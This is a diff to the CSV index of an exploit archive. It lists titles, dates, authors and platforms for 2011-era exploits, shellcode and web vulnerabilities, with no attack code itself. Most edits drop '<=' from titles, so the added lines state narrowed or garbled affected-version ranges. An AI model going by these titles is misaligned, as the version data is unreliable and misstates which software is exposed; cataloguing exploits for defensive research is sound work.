Inclusion/Edit",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload",2011-04-16,Alexander,asp,webapps,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 @@ -14956,7 +14956,7 @@ id,file,description,date,author,platform,type,port 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow Exploit",2011-04-18,sickness,windows,local,0 -17186,platforms/windows/local/17186.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0 +17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 @@ -14964,7 +14964,7 @@ id,file,description,date,author,platform,type,port 17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 - Multiple CSRF Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 -17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,Metasploit,windows,remote,0 +17195,platforms/windows/remote/17195.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)",2011-04-19,Metasploit,windows,remote,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,Metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS",2011-04-22,Saif,php,webapps,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 @@ -14983,9 +14983,9 @@ id,file,description,date,author,platform,type,port 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,Metasploit,windows,remote,18821 -17220,platforms/php/webapps/17220.txt,"eyeos <= 1.9.0.2 - Stored XSS using image files",2011-04-28,"Alberto Ortega",php,webapps,0 -17221,platforms/php/webapps/17221.txt,"kusaba x <= 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 -17222,platforms/linux/dos/17222.c,"libmodplug <= 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 +17220,platforms/php/webapps/17220.txt,"eyeos 1.9.0.2 - Stored XSS using image files",2011-04-28,"Alberto Ortega",php,webapps,0 +17221,platforms/php/webapps/17221.txt,"kusaba x 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 +17222,platforms/linux/dos/17222.c,"libmodplug 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 17224,platforms/osx/shellcode/17224.s,"OS-X/Intel (x86_64) - reverse_tcp shell shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - (.m3u) SEH Unicode Buffer Overflow",2011-04-28,Metasploit,windows,local,0 @@ -14995,9 +14995,9 @@ id,file,description,date,author,platform,type,port 17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - (.s3m) Stack Buffer Overflow",2011-04-30,Metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS - SQL Injection",2011-05-02,Alexander,php,webapps,0 -17243,platforms/windows/remote/17243.txt,"SPlayer <= 3.7 - (build 2055) Buffer Overflow Exploit",2011-05-04,xsploitedsec,windows,remote,0 +17243,platforms/windows/remote/17243.txt,"SPlayer 3.7 - (build 2055) Buffer Overflow Exploit",2011-05-04,xsploitedsec,windows,remote,0 17317,platforms/windows/local/17317.rb,"VisiWave VWR File Parsing Trusted Pointer",2011-05-23,Metasploit,windows,local,0 -17318,platforms/multiple/local/17318.php,"PHP <= 5.3.5 - socket_connect() Buffer Overflow",2011-05-25,"Marek Kroemeke",multiple,local,0 +17318,platforms/multiple/local/17318.php,"PHP 5.3.5 - socket_connect() Buffer Overflow",2011-05-25,"Marek Kroemeke",multiple,local,0 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 17319,platforms/php/webapps/17319.txt,"Tickets 2.13 SQL Injection",2011-05-25,"AutoSec Tools",php,webapps,0 17235,platforms/php/webapps/17235.html,"Exponent CMS 2.0 Beta 1.1 - CSRF Add Administrator Account PoC",2011-05-02,outlaw.dll,php,webapps,0 @@ -15041,8 +15041,8 @@ id,file,description,date,author,platform,type,port 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - LFI",2011-05-16,"AutoSec Tools",php,webapps,0 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - DoS",2011-05-16,nSense,netware,dos,0 -17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human <= 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 -17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS <= 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,Metasploit,windows,remote,0 +17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 +17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow",2011-05-16,Metasploit,windows,remote,0 17302,platforms/windows/local/17302.py,"Sonique 1.96 - (.m3u) Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0 17303,platforms/php/webapps/17303.txt,"Joomla 1.0 Component jDownloads - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0 @@ -15050,18 +15050,18 @@ id,file,description,date,author,platform,type,port 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel DoS Exploit",2011-05-18,"Lufeng Li",windows,dos,0 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0 17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0 -17308,platforms/php/webapps/17308.txt,"Zen Cart <= 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 +17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0 17311,platforms/php/webapps/17311.txt,"E-Manage MySchool 7.02 SQL Injection",2011-05-21,az7rb,php,webapps,0 17312,platforms/php/webapps/17312.txt,"tugux CMS 1.2 - Multiple Vulnerabilities",2011-05-22,LiquidWorm,php,webapps,0 17313,platforms/windows/local/17313.rb,"Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow",2011-05-22,Metasploit,windows,local,0 -17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x <= 4.1.2 - (search.php) SQL Injection",2011-05-23,D4rkB1t,php,webapps,0 -17316,platforms/php/webapps/17316.txt,"PHPortfolio SQL Injection Vulnerbility",2011-05-23,lionaneesh,php,webapps,0 +17314,platforms/php/webapps/17314.txt,"vBulletin 4.0.x 4.1.2 - (search.php) SQL Injection",2011-05-23,D4rkB1t,php,webapps,0 +17316,platforms/php/webapps/17316.txt,"PHPortfolio SQL Injection",2011-05-23,lionaneesh,php,webapps,0 17320,platforms/php/webapps/17320.txt,"i-doIT 0.9.9-4 - LFI",2011-05-25,"AutoSec Tools",php,webapps,0 17321,platforms/php/webapps/17321.txt,"ExtCalendar 2.0b2 - (cal_search.php) SQL Injection",2011-05-25,"High-Tech Bridge SA",php,webapps,0 17322,platforms/php/webapps/17322.txt,"egroupware 1.8.001.20110421 - Multiple Vulnerabilities",2011-05-25,"AutoSec Tools",php,webapps,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 -17324,platforms/php/webapps/17324.rb,"AWStats Totals <= 1.14 multisort - Remote Command Execution",2011-05-25,Metasploit,php,webapps,0 +17324,platforms/php/webapps/17324.rb,"AWStats Totals 1.14 multisort - Remote Command Execution",2011-05-25,Metasploit,php,webapps,0 17325,platforms/php/webapps/17325.py,"Clipbucket 2.4 RC2 645 SQL Injection",2011-05-26,"AutoSec Tools",php,webapps,0 17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0 17327,platforms/php/webapps/17327.txt,"HB Ecommerce - SQL Injection",2011-05-27,takeshix,php,webapps,0 @@ -15090,12 +15090,12 @@ id,file,description,date,author,platform,type,port 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 17360,platforms/windows/webapps/17360.txt,"WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Command Injection",2011-06-04,rgod,windows,webapps,0 17361,platforms/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous ",windows,remote,0 -17362,platforms/windows/local/17362.cpp,"OpenDrive <= 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous ",windows,local,0 +17362,platforms/windows/local/17362.cpp,"OpenDrive 1.3.141 - Local Password Disclosure",2011-06-04,"Glafkos Charalambous ",windows,local,0 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - (.zip) Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0 17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows XP SP3 DEP Bypass)",2011-06-06,"dookie and ronin",windows,local,0 17365,platforms/windows/remote/17365.py,"IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM Exploit",2011-06-07,"Jeremy Brown",windows,remote,0 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 -17367,platforms/php/webapps/17367.html,"Dataface Local File Include",2011-06-07,ITSecTeam,php,webapps,0 +17367,platforms/php/webapps/17367.html,"Dataface Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP Remote BoF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 @@ -15115,7 +15115,7 @@ id,file,description,date,author,platform,type,port 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 -17391,platforms/linux/local/17391.c,"Linux Kernel <= 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 +17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,Metasploit,windows,remote,0 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion (0Day)",2011-06-13,jdc,php,webapps,0 @@ -15157,7 +15157,7 @@ id,file,description,date,author,platform,type,port 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 -17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 +17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat Multiple Blind SQL Injection Vulnerabilities",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions - (cmspages.php) SQL Injection",2011-06-23,"Newbie Campuz",php,webapps,0 @@ -15185,7 +15185,7 @@ id,file,description,date,author,platform,type,port 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - RTF Header Stack Overflow Exploit",2011-07-03,Snake,windows,local,0 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 -17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos,0 +17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server 7.0 - Stack Exhaustion DoS (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos,0 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 @@ -15196,7 +15196,7 @@ id,file,description,date,author,platform,type,port 17484,platforms/php/webapps/17484.txt,"DmxReady Links Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,php,webapps,0 17485,platforms/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,php,webapps,0 17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow PoC (ROP)",2011-07-04,"Jonathan Salwan",multiple,local,0 -17487,platforms/php/webapps/17487.php,"WeBid <= 1.0.2 - (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 +17487,platforms/php/webapps/17487.php,"WeBid 1.0.2 - (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow Exploit (Metasploit)",2011-07-04,"James Fitts",windows,local,0 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,Metasploit,windows,remote,0 @@ -15212,9 +15212,9 @@ id,file,description,date,author,platform,type,port 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection",2011-07-07,kaMtiEz,php,webapps,0 17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U DoS/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - (.MPPL) Stack Buffer Overflow",2011-07-07,Metasploit,windows,local,0 -17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 +17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 -39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,Metasploit,windows,remote,80 +39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80 39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,Metasploit,windows,remote,21 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 @@ -15227,13 +15227,13 @@ id,file,description,date,author,platform,type,port 17518,platforms/php/webapps/17518.txt,"Tugux CMS 1.2 - (pid) Arbitrary File Deletion",2011-07-10,LiquidWorm,php,webapps,0 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server (LIST command) Buffer Overflow Exploit",2011-07-10,"Zer0 Thunder",windows,remote,0 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer",2011-07-10,Metasploit,windows,remote,0 -17522,platforms/php/webapps/17522.txt,"Fire Soft Board <= 2.0.1 Persistent XSS (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps,0 +17522,platforms/php/webapps/17522.txt,"Fire Soft Board 2.0.1 Persistent XSS (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps,0 17523,platforms/php/webapps/17523.txt,"Tradingeye E-commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 17525,platforms/php/webapps/17525.txt,"Xmap 1.2.11 Joomla Component Blind SQL Injection",2011-07-12,jdc,php,webapps,0 17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 PASV Buffer Overflow PoC",2011-07-12,"Craig Freyman",windows,remote,0 -17528,platforms/php/webapps/17528.txt,"LiteRadius <= 3.2 - Multiple Blind SQL Injection Vulnerabilities",2011-07-13,"Robert Cooper",php,webapps,0 -17529,platforms/php/webapps/17529.txt,"TCExam <= 11.2.011 - Multiple SQL Injection Vulnerabilities",2011-07-13,LiquidWorm,php,webapps,0 +17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injection Vulnerabilities",2011-07-13,"Robert Cooper",php,webapps,0 +17529,platforms/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injection Vulnerabilities",2011-07-13,LiquidWorm,php,webapps,0 17530,platforms/php/webapps/17530.txt,"SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections",2011-07-14,jdc,php,webapps,0 17531,platforms/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - (contact_us.php) Multiple POST XSS Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 @@ -15253,12 +15253,12 @@ id,file,description,date,author,platform,type,port 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - DoS",2011-07-19,Unknown,multiple,dos,0 17550,platforms/windows/remote/17550.py,"FreeFloat FTP Server 1.0 - ACCL Buffer Overflow Exploit",2011-07-19,mortis,windows,remote,0 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Stored XSS",2011-07-20,"Sense of Security",jsp,webapps,0 -17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x <= 4.1.3 - (messagegroupid) SQL Injection (0Day)",2011-07-21,fb1h2s,php,webapps,0 +17555,platforms/php/webapps/17555.txt,"Vbulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection (0Day)",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla Component JE K2 Story Submit Local File Inclusion",2011-07-21,v3n0m,php,webapps,0 17557,platforms/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 17560,platforms/php/webapps/17560.txt,"Joomla Component mod_spo SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0 -17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys <= 2011.7.8.913 - Local Kernel Mode Privilege Escalation Exploit",2011-07-22,MJ0011,windows,local,0 +17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys 2011.7.8.913 - Local Kernel Mode Privilege Escalation Exploit",2011-07-22,MJ0011,windows,local,0 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Auth Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow Exploit (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17564,platforms/osx/shellcode/17564.asm,"OS-X - Universal ROP shellcode",2011-07-24,pa_kt,osx,shellcode,0 @@ -15266,22 +15266,22 @@ id,file,description,date,author,platform,type,port 17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0 17567,platforms/osx/dos/17567.txt,"Safari 5.0.6/5.1 - SVG DOM Processing PoC",2011-07-25,"Nikita Tarakanov",osx,dos,0 17569,platforms/windows/dos/17569.py,"Ciscokits 1.0 - TFTP Server File Name DoS",2011-07-25,"Craig Freyman",windows,dos,0 -17570,platforms/php/webapps/17570.txt,"Musicbox <= 3.7 - Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0 +17570,platforms/php/webapps/17570.txt,"Musicbox 3.7 - Multiple Vulnerabilites",2011-07-25,R@1D3N,php,webapps,0 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 - SVG Remote Code Execution Exploit (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 17578,platforms/windows/remote/17578.txt,"MinaliC Webserver 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 -17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart <= 1.1.7 - Blind time-based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 +17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart 1.1.7 - Blind time-based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 -17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 - (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 +17584,platforms/php/webapps/17584.php,"cFTP 0.1 - (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0 -17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (0Day) (Metasploit)",2011-07-31,mr_me,windows,remote,0 +17588,platforms/windows/remote/17588.rb,"Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (0Day) (Metasploit)",2011-07-31,mr_me,windows,remote,0 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion",2011-07-31,v3n0m,php,webapps,0 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - CSRF",2011-08-01,Xadpritox,php,webapps,0 @@ -15300,18 +15300,18 @@ id,file,description,date,author,platform,type,port 17610,platforms/multiple/dos/17610.py,"OpenSLP 1.2.1 & < 1647 trunk - Denial of Service Exploit",2011-08-05,"Nicolas Gregoire",multiple,dos,0 17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow Exploit",2011-08-05,ZadYree,linux,local,0 17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote,0 -17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce <= 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 +17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0 -17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin <= 4.7.7 - SQL 